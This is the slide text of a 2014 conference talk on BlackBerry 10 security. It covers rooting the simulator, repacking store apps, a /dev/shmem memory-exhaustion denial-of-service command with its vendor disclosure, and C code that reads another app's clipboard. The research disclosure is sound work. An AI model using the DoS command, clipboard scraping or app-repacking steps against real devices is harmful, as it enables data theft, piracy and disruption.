Upload
thomas-richards
View
373
Download
1
Embed Size (px)
DESCRIPTION
Picking Blackberries GrrCON 2014 Presentation
Citation preview
1 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
GRRCON 2014
Picking Blackberries
THOMAS RICHARDS
2 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
About Me
• Thomas Richards
• Security Consultant @ Cigital, Inc
• @g13net - Twitter
• Web App, Mobile, Red Team
assessments
• Organizer for BsidesROC
• Presented previously at DerbyCON,
GrrCON, CarolinaCON, BsidesSF
3 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
ToC
• 0x1 Intro + History
• 0x2 BB10 Platform Security
• 0x3 BB10 Simulator
• 0x4 BB10 Apps
• 0x5 Misc
4 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
0x1 Intro
5 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Blackberry
• What is Blackberry?
o Formally Research in Motion(RIM)
oCanadian
o Started with Pagers
• Introduced its first smartphone to receive corporate email in April 2000
• Very popular with governments and businesses
oUntil about 2007
6 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
7 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
BBOS
• Original proprietary OS used on
Blackberry handsets
• Ran Java Apps
• If you owned a Blackberry before 2013
this is what you used
• Last version released is 7.1
8 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
BB10
• In an attempt to stay relevant and
compete against iOS and Android, BB
released BB10
• Radical departure from previous Oses
• Based on QNX
• What happened to BB8 and BB9?
9 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
QNX
• Commercial Unix-like real-time operating
system.
• Originally targeted at the embedded
systems market
• First version released in 1982
10 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
QNX Cont.
• Micro-kernel Based
• Real-Time Operating System
• POSIX compliant
11 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
QNX Architecture
12 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Acquired by BB
• QNX was bought by BB in 2010
• The next day, access to the source code
was restricted
• The Blackberry Playbook was the first
BB device to run a QNX based OS
• Tablet OS
13 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Playbook
14 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Z10
• First BB10 based phone
• Released in 2013
• Did not include a hardware keyboard
15 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Insert picture of Z10
16 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Tablet OS Vs BB10
• Aside from UI changes
• Android Applications
oWha????
17 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Android on BB10
• Full Android Environment and runtime
• Originally Apps needed to be “wrapped”
• Newer versions support traditional APKs
• App Stores?
o Play Store was not there
o BB announced partnership with Amazon to
include Amazon Store in BB10.3
18 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
0x2 BB10 Platform Security
19 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Landscape
• The Playbook was rooted early on, BB
was determined to prevent that on new
BB10 phones
• Introduced a number of hardware and
software security measures to keep the
devices secure and locked
20 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Rooting Playbook
• Took advantage of unsigned backup files
• Modifies the backup and edits
Samba.conf
• Blackberry patched this.
• Dingleberry
21 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
System Protection
• To prevent exploits:
o ASLR is enabled
o Stack Canaries
oDEP
22 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Hardware Protection
• Firmware images are signed
• Blackberry controls both the hardware
and software
• Keys to verify the firmware images are
embedded
23 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Secure Boot
24 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Application Sandboxing
• Done by filesystem permissions
• Enforced by authman
• Memory is also contained
25 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Authman
• Authorization Manager
• Resource manager which handles
requests from processes
• Apps send requests through launcher
• Authman verifies the apps have
permission to access the service or
component they are requesting
26 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Dual Persona
• Blackberry Balance
oWork and Personal “spaces”
o Enforced by filesystem permissions and
authman
oWork apps are separate from personal ones
27 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Balance Boundries
• When I had access to BB10 in an
enterprise environment….
• The Workspace was able to access files
and information in the personal space
o Email information, clipboard
o These files were world-readable
28 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
0x3 BB10 Simulator
29 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Developing for BB10
• BB offers a simulator to test apps without
needing a BB10 device
• Vmware image
• x86
o Actual BB10 devices are ARM
30 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
No Registration Required!
31 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Simulator
32 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Couple of Caveats
• Applications compiled for the Sim need
to be recompiled for a device
o Symbols get stripped when compiled for a
device
• No root access*
• No Blackberry World access*
33 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Rooting the Simulator
• Wanted to start digging around at the
internals of the system.
• Already had shell access
• How to get root?
34 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Editing the FS
• Needed to mount vmware disk image in
another VM in order to modify the disk
• Linux only has read support for the
QNX6 FS(what is one the BB10)
• Solution?
35 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
QNX Neutrino VMWare Image
36 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
QNX Neutrino Vmware Image
• No registration needed
• QNX environment which supports QNX6!
• Profit!
37 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
How to root
• Add BB10 sim disk to QNX SDP VM
• Boot
• Mount the disk
• Edit /etc/shadow to include a root entry
o I copied the devuser entry from the QNX
image so I knew the password
• Woot.
38 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
39 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
40 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Shadow file
41 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Blackberry World Access
• On Beta releases of the Sim, BBWorld
access was restricted
• Two things were needed:
o Blackberry ID
o Valid Hardware ID
• Found a way to spoof it and gain
BBWorld access
42 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
However…
• It appears BB has made my efforts futile
• BBWorld works on version 10.0.09-2372
of the simulator
• Without changes ?
43 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
44 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Next Steps
• Explore file system
• See Zach Lanier and Ben Nell’s talk from
CanSecWest
45 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
0x4 BB10 Apps
46 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Write apps in…
• Native
oC/C++
• HTML5
• Adobe AIR
• Android!
47 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
BB10 App Packaging
• BAR files
• Similar to APKs, basically signed ZIP
archives
• Will contain two directories, META-INF
and native(or android)
48 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Exploded BAR
49 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
META-INF
• Contains MANIFEST.MF
• Package Information
• Checksums
• Etc.
50 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Native/
• Bardescriptor.xml
• Application binary and assets
51 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Exploring BBWorld
• With World access on the rooted
simulator
• We can start to explore and pick apart
apps on the market
52 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Casual Observations
• Want to do mobile banking?
• Only two US banks are:
oWells Fargo
o BoA
• Lots of European and Canadian Banks!
53 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Oh and…
• Of course Bitcoin
54 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Details, Details
55 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Reviews
56 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Sachesi
• Open source tool to extract, search,
(un)install BB firmware and applications
• Also can backup, restore, wipe, and
nuke a device
• New version has access to browse BB
World
57 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
AppWorld
58 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Firmware
59 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Installing Apps
60 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Repacking Apps
• As stated before, each BAR file will
contain META-INF/ and native/(or
android/) directories.
• When an app is installed on a device, the
BAR file gets removed.
• What is left behind…..
61 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
62 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Yay….
• The public/ dir isn’t needed
• With root access to the simulator
• With BB World running on the simulator
• …
• We can extract apps from the simulator
for repacking(malicious or piracy)
63 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Quick Note
• Pretty sure third party BB app stores
aren’t a thing.
• This is purely academic
64 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
How to Repack A BB App
• Sign up and get a BB Developer Cert
o Free!
o Incredibly long process…not detailing here
• Download app from World in simulator
• Extract installed directory
• Add META-INF/ and native/ to new .BAR file(just a ZIP)
• Sign .BAR with your cert
• Profit!
65 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Creating the Bar
66 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Signing the Bar
67 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Sachesi again
• Debug token is not needed to install
BARs onto a BB
• They can be sideloaded with Sachesi
68 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Installed BAR
69 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
App on Device
70 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Proxy Settings
• So you want to fiddle with an app that is
running on the device
• BB10 contains settings to enable a proxy
and install root CA certificates(like
Burp’s)
71 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Proxy Settings
72 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
How to Import a Cert
73 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Traffic in Burp
74 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
0x5 Misc
75 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Device DoS
• There are lots of QNX documents
available online
• Browsing around, /dev/shmem took
interest
76 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
/dev/shmem
77 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Exploit
• /dev/shmem is the entire RAM
• Using DD you can just fill the entire RAM
• dd if=/dev/zero of=/dev/shmem/dos
bs=1-24 count=1000000000
• Device will require a reboot
78 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Reporting
• Told BB about it, this was their response:
• While it would be ideal to have the
system be more stable under intentional
resource exhaustion by non-privileged
apps, that's an area for future design
changes and not a vulnerability we would
release a security update for.
• TL;DR – We’ll look into it later
79 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
The Clipboard
• World readable and writeable directory
• Apps can write files outside of their
sandbox
• Any app can read the clipboard file
without using APIs(like in Android and
iOS)
80 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Insert Picture of balls created
81 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Code for scraping clipboard
//open file as binary
char content[250];
FILE *fp =
fopen("/accounts/1000/clipboard/text.plain"
, "r");
int rc = fscanf(fp, "%s", &content);
82 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Blackberry-connect
• Shell access to a device is very limited.
• Only SSH
• Must use blackberry-connect to push
public key
• Must auth with private key
• devuser
83 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Interesting bits